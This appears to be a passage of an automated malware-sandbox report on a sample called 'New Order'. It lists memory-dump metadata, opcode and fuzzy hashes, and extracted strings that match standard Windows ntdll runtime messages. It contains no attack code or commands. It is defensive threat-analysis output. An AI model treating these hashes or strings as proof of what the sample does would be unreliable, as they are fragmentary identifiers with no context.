                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0710e665e2cae0e605cd90530396807ce51801c9b32f8e47453f3269b4903230
                                                                                                                              • Instruction ID: 06d1e554ecc351e08e17ca5b26dd9319e4ea39abf35984336c7b5510fde95f84
                                                                                                                              • Opcode Fuzzy Hash: 0710e665e2cae0e605cd90530396807ce51801c9b32f8e47453f3269b4903230
                                                                                                                              • Instruction Fuzzy Hash: 9A90022130140007D281715954186064405E7E2301F55D012F5418554CD9158A5A5723
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 914d59005b677f00ab80b6777af9c0b4996401e5abe3a789377e80bf16aa37b4
                                                                                                                              • Instruction ID: 32e77d2b029780e17746887c9bba2d4eafca2144ef59bdbdac42d3f1dd21ad71
                                                                                                                              • Opcode Fuzzy Hash: 914d59005b677f00ab80b6777af9c0b4996401e5abe3a789377e80bf16aa37b4
                                                                                                                              • Instruction Fuzzy Hash: 8490023120140406D241759954086460405D7E1301F55D012BA028555EC6658A956632
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8e627f8bdbcf3864976cc4f1e2d7f4c99e8474c55eb3384dd18d4b458bf04ea0
                                                                                                                              • Instruction ID: 71da3074bdc6114e7b284999d1595c9e65c6680ed118fd3c01420d29848ed26d
                                                                                                                              • Opcode Fuzzy Hash: 8e627f8bdbcf3864976cc4f1e2d7f4c99e8474c55eb3384dd18d4b458bf04ea0
                                                                                                                              • Instruction Fuzzy Hash: 9890022160540406D281715954187060415D7D1301F55D012B5028554DC6598B596BA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 26be8f20111cd9079b9f6a04b2f148d943c0a32ae678cb402d688de004f25f74
                                                                                                                              • Instruction ID: 82248a0ec6d5370b91694004f9f29c1864b1606e651d94dcc05dea68257a9ad4
                                                                                                                              • Opcode Fuzzy Hash: 26be8f20111cd9079b9f6a04b2f148d943c0a32ae678cb402d688de004f25f74
                                                                                                                              • Instruction Fuzzy Hash: E890023120140407D241715955087070405D7D1301F55D412B5428558DD6568A556622
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f0e770e62c03622bd9a8081e2f38d3deaf0e2a1b8979427e3ae642886686fc5b
                                                                                                                              • Instruction ID: f38a01c234397744e44813ab95d1c51b1d30fd43315f0f2fe7a0e88ce43c1726
                                                                                                                              • Opcode Fuzzy Hash: f0e770e62c03622bd9a8081e2f38d3deaf0e2a1b8979427e3ae642886686fc5b
                                                                                                                              • Instruction Fuzzy Hash: 7F90023120140846D24171594404B460405D7E1301F55C017B5128654DC615CA557A22
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f23c3ff3f335c9ca87643121e76483e8cbc87a6556fbec670ea7c45ba7e9e010
                                                                                                                              • Instruction ID: 979a162a6b3cd00562f6e3fb2fad70aa4a317e539a4c352a1a55aa39295d2f4e
                                                                                                                              • Opcode Fuzzy Hash: f23c3ff3f335c9ca87643121e76483e8cbc87a6556fbec670ea7c45ba7e9e010
                                                                                                                              • Instruction Fuzzy Hash: 1A90023120180406D2417159481470B0405D7D1302F55C012B6168555DC6258A556A72
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c2ccf4270d7f4e88d9174f0c8949b98c012fee616f608bdb96504da67f12c9c1
                                                                                                                              • Instruction ID: 1e8b21fa3de938e25dcff2ef3ee5e97dd8a7a69401d08f6ed632d57dabb4a27b
                                                                                                                              • Opcode Fuzzy Hash: c2ccf4270d7f4e88d9174f0c8949b98c012fee616f608bdb96504da67f12c9c1
                                                                                                                              • Instruction Fuzzy Hash: 0B90023120180406D241715948087470405D7D1302F55C012BA168555EC665CA956A32
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 664505a26aaa76a4dd1334b06fad636375fcdce29d245a2d2f75d2d9d2539367
                                                                                                                              • Instruction ID: 9f1eeecc502ed8094b4c2c796b48507f33edafeb575b3965977aa65d4bd0246b
                                                                                                                              • Opcode Fuzzy Hash: 664505a26aaa76a4dd1334b06fad636375fcdce29d245a2d2f75d2d9d2539367
                                                                                                                              • Instruction Fuzzy Hash: 62900221601400464281716988449064405FBE2311755C122B599C550DC5598A695B66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8898727ffc23eb4f5c53b441b14b47b290c56b64e728f623f4e21a0b840010ec
                                                                                                                              • Instruction ID: a79e86d255432b066e9e50ea74cbd84e9c5373d6c11888b87ca19c58f09357a9
                                                                                                                              • Opcode Fuzzy Hash: 8898727ffc23eb4f5c53b441b14b47b290c56b64e728f623f4e21a0b840010ec
                                                                                                                              • Instruction Fuzzy Hash: 67900221211C0046D34175694C14B070405D7D1303F55C116B5158554CC9158A655A22
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bc4f87e87b1292b62edbbac9b75ae1a63cd22bc8fd785d37d73874c14e89be07
                                                                                                                              • Instruction ID: 3dd2a0c156c9458ba7fc4f16ff251ae7b607cb99b8bc043166140814d5569106
                                                                                                                              • Opcode Fuzzy Hash: bc4f87e87b1292b62edbbac9b75ae1a63cd22bc8fd785d37d73874c14e89be07
                                                                                                                              • Instruction Fuzzy Hash: 6390026134140446D24171594414B060405D7E2301F55C016F6068554DC619CE566627
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eccbdf3f067d9021c067d88cffcf6742cb65eeb4ca80e912e672255d599ad218
                                                                                                                              • Instruction ID: 27cfb8073caee5078ee4ff8c500976e649ce7a717d5b1da0a198c563a990ebb3
                                                                                                                              • Opcode Fuzzy Hash: eccbdf3f067d9021c067d88cffcf6742cb65eeb4ca80e912e672255d599ad218
                                                                                                                              • Instruction Fuzzy Hash: 6E90026121140046D245715944047060445D7E2301F55C013B7158554CC5298E655626
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2aae1d5997038620159eea1dd691660924ef2b0e9b69231f4fe1fe0cb144a775
                                                                                                                              • Instruction ID: 344a8f2abf7da5226929874857812dc65e04f6ce0c39318435cbdb4ed7270f6a
                                                                                                                              • Opcode Fuzzy Hash: 2aae1d5997038620159eea1dd691660924ef2b0e9b69231f4fe1fe0cb144a775
                                                                                                                              • Instruction Fuzzy Hash: F390022160140506D24271594404616040AD7D1341F95C023B6028555ECA258B96A632
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e9d914e6057b48da24ac797270427f615809036cfaae31d19b117cf85df21202
                                                                                                                              • Instruction ID: f1da57029ee4288736cdcb131633c19a191e459487d3a83dc3ae487355095595
                                                                                                                              • Opcode Fuzzy Hash: e9d914e6057b48da24ac797270427f615809036cfaae31d19b117cf85df21202
                                                                                                                              • Instruction Fuzzy Hash: 9090027120140406D281715944047460405D7D1301F55C012BA068554EC6598FD96B66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e99a18ccf99aab28d81e778aa20ab27e6689b7ab14868781fa1b76f305b2288e
                                                                                                                              • Instruction ID: 4d59b8518fc20cd6cf4a99cfe567efd3f07b99527c20a6d2d6406c6f5212cbfa
                                                                                                                              • Opcode Fuzzy Hash: e99a18ccf99aab28d81e778aa20ab27e6689b7ab14868781fa1b76f305b2288e
                                                                                                                              • Instruction Fuzzy Hash: 0290026120180407D281755948046070405D7D1302F55C012B7068555ECA298E556636
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 603974b34746af6acd3d728065d6186ff2d5f534af071338eece37dcb55e9aae
                                                                                                                              • Instruction ID: c7a42eb24a97ce5b3773e99021b6bbf6e04b92074585bd99cf927b486d2a6039
                                                                                                                              • Opcode Fuzzy Hash: 603974b34746af6acd3d728065d6186ff2d5f534af071338eece37dcb55e9aae
                                                                                                                              • Instruction Fuzzy Hash: 1590022130140406D243715944146060409D7D2345F95C013F6428555DC6258B57A633
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 01cd92d4f572f8ae4a1fa56cc8216ec592df8c87cebd9eeef30c0c51ee803700
                                                                                                                              • Instruction ID: 584ff8bdcf5ea2a63f7723038de20ac4cb0c3daf818b0036d4231ed90dbc52e8
                                                                                                                              • Opcode Fuzzy Hash: 01cd92d4f572f8ae4a1fa56cc8216ec592df8c87cebd9eeef30c0c51ee803700
                                                                                                                              • Instruction Fuzzy Hash: 1890022124140806D281715984147070406D7D1701F55C012B5028554DC6168B696BB2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: faafd7e69edc78380b4437f4fee155f42c28fb11bef880f10b44e37d73fd9334
                                                                                                                              • Instruction ID: c7fa29ac9f980d0685d23db8d529316bfaa5e36bf7246f018ddd6094e644b56d
                                                                                                                              • Opcode Fuzzy Hash: faafd7e69edc78380b4437f4fee155f42c28fb11bef880f10b44e37d73fd9334
                                                                                                                              • Instruction Fuzzy Hash: 4D90022120184446D28172594804B0F4505D7E2302F95C01AB915A554CC9158A595B22
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c0f7f41eac6a06da4e26967e5a44c975ae53fea27661038157718af5ae7360e0
                                                                                                                              • Instruction ID: 21c51f7ef29b13a5fe23ae6f8ef5884c9bf8a6dff4fa17c5de9d664cb37bfaa0
                                                                                                                              • Opcode Fuzzy Hash: c0f7f41eac6a06da4e26967e5a44c975ae53fea27661038157718af5ae7360e0
                                                                                                                              • Instruction Fuzzy Hash: 1290022124545106D291715D44046164405F7E1301F55C022B5818594DC5558A596722
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 30a76e0f1cee2079012d40b14aac9061204a38bb50a0dd8a710ce88ed2c0a4cc
                                                                                                                              • Instruction ID: a5084bc6bad30e0ee6eb05e3e24b0278c4518a6e0bd8945709fbd791d91ad68f
                                                                                                                              • Opcode Fuzzy Hash: 30a76e0f1cee2079012d40b14aac9061204a38bb50a0dd8a710ce88ed2c0a4cc
                                                                                                                              • Instruction Fuzzy Hash: EC90023120240146968172595804A4E4505D7E2302B95D416B5019554CC9148A655722
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1d66b8ad11d0a0b646b68086c54811abb0dbecf2b03ed58af5e03af961c51acf
                                                                                                                              • Instruction ID: fb9db82e1be6a39cbbbf6dde6c33db016ea35fc88c7bf50e935412d81ece2f8c
                                                                                                                              • Opcode Fuzzy Hash: 1d66b8ad11d0a0b646b68086c54811abb0dbecf2b03ed58af5e03af961c51acf
                                                                                                                              • Instruction Fuzzy Hash: F890023520140406D651715958046460446D7D1301F55D412B5428558DC6548AA5A622
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction ID: 3614c6967db129892fb6dea05f8850075bcc06a13b5a958a712c0f69544c3b20
                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 699260abc55db063fa12d63e8820083c8e3f163fcaf6abf6d543e4ffd133e1c5
                                                                                                                              • Instruction ID: ac23de48fb500d35b4afcf67ba69a75185f83c6d14bf788d342e7f61133f3053
                                                                                                                              • Opcode Fuzzy Hash: 699260abc55db063fa12d63e8820083c8e3f163fcaf6abf6d543e4ffd133e1c5
                                                                                                                              • Instruction Fuzzy Hash: 0751F6B6A0411EBFDB11DBAC989097EFBB9BB083407148229F4A5D7642D734DF0087A0
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 4bf5bd5f7a77cdaacc0c494fd6cb0c675c5c171d6ff49ef11333654d7ce3e145
                                                                                                                              • Instruction ID: 44c98392fce92e671d1afc68ff197d3865f8cab0129e0b2f09c605f4bcd57db0
                                                                                                                              • Opcode Fuzzy Hash: 4bf5bd5f7a77cdaacc0c494fd6cb0c675c5c171d6ff49ef11333654d7ce3e145
                                                                                                                              • Instruction Fuzzy Hash: 4251D5B1A00646AACB64DE5CC8D09BFB7BAEB44305B048459F5A6D7742D678EB40C760
                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01874725
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01874655
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018746FC
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01874742
                                                                                                                              • Execute=1, xrefs: 01874713
                                                                                                                              • ExecuteOptions, xrefs: 018746A0
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01874787
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: ef1eee5da71aa3d60e20f6db1df3bd845dbdd36c4907c3e3bc885bf84dc66d40
                                                                                                                              • Instruction ID: d190ed524e5e2cd3b87299e1ecf214e270e9aa7426c39b0242603323cefc47f3
                                                                                                                              • Opcode Fuzzy Hash: ef1eee5da71aa3d60e20f6db1df3bd845dbdd36c4907c3e3bc885bf84dc66d40
                                                                                                                              • Instruction Fuzzy Hash: 955119B160021E7BEF21EAA8DC95FA977A8EF58304F0800A9D605E7191EB70DF45DF91
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: f26c6fb16188348fba4d2f586a791c19bf612f9b85a0f072aa505761c421dbc2
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction Fuzzy Hash: 1E81AD70A0524D9FEF29CF6CC8917BEBBA2AF45360F18411AD861E7291CF34DA408B51
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 2bae25563fc3c2ada4bf629c73fdfca0e035a964dc398d8c7f7dbe8ed4e41a9a
                                                                                                                              • Instruction ID: bc9caf8315a3c17b82cd9ac710b2cfe562dcca70f4cf4c4ad5cba1f846c714a8
                                                                                                                              • Opcode Fuzzy Hash: 2bae25563fc3c2ada4bf629c73fdfca0e035a964dc398d8c7f7dbe8ed4e41a9a
                                                                                                                              • Instruction Fuzzy Hash: A121367AA00519ABDB11DE6DD890AEEBBE9EF54754F44011AE955D3300E730FB028BA1
                                                                                                                              Strings
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018702BD
                                                                                                                              • RTL: Re-Waiting, xrefs: 0187031E
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018702E7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: 5c7d235422a66f488d299de06dd2a628f3f8256f2a0dfb79140d956c4eb4763e
                                                                                                                              • Instruction ID: 6a1c70253d347fe36c499c9dc22a0572d32c3bfd17c2090056a58199876cfa93
                                                                                                                              • Opcode Fuzzy Hash: 5c7d235422a66f488d299de06dd2a628f3f8256f2a0dfb79140d956c4eb4763e
                                                                                                                              • Instruction Fuzzy Hash: E0E19C316087569FD726CF28C884B2ABBF0AB85718F140A1DF6A5CB2D1D774DA84CB52
                                                                                                                              Strings
                                                                                                                              • RTL: Resource at %p, xrefs: 01877B8E
                                                                                                                              • RTL: Re-Waiting, xrefs: 01877BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01877B7F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: 9d77171e277489cd6466c1b5445507e3882cc72a39731d7c0b8c5414460ad346
                                                                                                                              • Instruction ID: e70e4bb5f82a35603c672f1dd19d73a32466306183061eaa08cfae3305ff5c70
                                                                                                                              • Opcode Fuzzy Hash: 9d77171e277489cd6466c1b5445507e3882cc72a39731d7c0b8c5414460ad346
                                                                                                                              • Instruction Fuzzy Hash: 4A41D4713047069FD724DE2DC840B6AB7E5EF99720F140A1DFA5ADB680DB31EA05CB92
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187728C
                                                                                                                              Strings
                                                                                                                              • RTL: Resource at %p, xrefs: 018772A3
                                                                                                                              • RTL: Re-Waiting, xrefs: 018772C1
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01877294
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: de1c687b5801b6d4328d1cb861ac84d444a0fbeb86db536852937e460e5c5e49
                                                                                                                              • Instruction ID: 3d43f4628cff6cf3230014b3ad0380f4cdcf3cd755c03b360da7abee9114c37b
                                                                                                                              • Opcode Fuzzy Hash: de1c687b5801b6d4328d1cb861ac84d444a0fbeb86db536852937e460e5c5e49
                                                                                                                              • Instruction Fuzzy Hash: 02411371700206ABC720DE29CC85F66B7A5FF94714F140619FA66EB280DB31EA52C7D1
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
